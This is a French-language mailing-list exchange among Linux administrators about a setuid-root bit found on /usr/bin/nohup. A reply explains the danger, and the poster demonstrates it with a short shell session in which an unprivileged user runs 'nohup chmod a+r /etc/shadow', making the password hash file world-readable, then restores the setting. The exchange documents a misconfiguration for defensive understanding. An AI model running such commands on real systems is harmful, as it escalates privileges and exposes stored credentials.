[gull] setuid root sur /usr/bin/nohup

Lloyd Dizon metal.lloyd at gmail.com
Fri Aug 14 10:56:05 CEST 2009


On Fri, Aug 14, 2009 at 10:27:39AM +0200, Daniel Cordey wrote:
> On Friday 14 August 2009 10:07:14 Lloyd Dizon wrote:
> 
> > Est-ce que vous voyez une utilité de mettre setuid root sur le binaire
> > nohup? 
> 
> Absolument pas et bien au contraire ! 
> 
> Je dirais meme que c'est dangereux dans la mesure ou le process va heriter du 
> EUID (-> UID). Cette commande est une sorte d'encapsuleur qui doit justement 
> herite des privileges de l'utilisateur et surtout pas les augmenter. En 
> configurant le setuid pour l'utilisateur root, toute commande executee avec 
> nohup devient alors 'root'. Ca revient a laisser tout le monde utiliser la 
> commande sudo sans mot de passe... On ne peut rever pire scenario !!!!!!


J'ai trouvé ça sur des machines que l'on doit gérer maintenant. Et je me demandais à quoi pensait les anciens administrateurs de ces systèmes...

J'ai fait des tests pour s'amuser:

W200735:/var/tmp# ls -l /usr/bin/nohup
-rwxr-xr-x 1 root root 26264 2008-04-04 16:22 /usr/bin/nohup

W200735:/var/tmp# chmod u+s /usr/bin/nohup

dizonl30 at W200735:~$ ls -l /etc/shadow
-rw-r----- 1 root shadow 995 2009-08-07 17:27 /etc/shadow

dizonl30 at W200735:~$ id
uid=1000(dizonl30) gid=1000(dizonl30) ....

dizonl30 at W200735:~$ nohup chmod a+r /etc/shadow
nohup: ignoring input and appending output to `nohup.out'

dizonl30 at W200735:~$ ls -l /etc/shadow
-rw-r--r-- 1 root shadow 995 2009-08-07 17:27 /etc/shadow


J'ai donc pu lire le contenu de /etc/shadow avec nohup en setuid root!


N'oubliez pas de remettre comme avant après ces tests:

W200735:/var/tmp# chmod u-s /usr/bin/nohup
W200735:/var/tmp# ls -l /usr/bin/nohup
-rwxr-xr-x 1 root root 26264 2008-04-04 16:22 /usr/bin/nohup




Lloyd


More information about the gull mailing list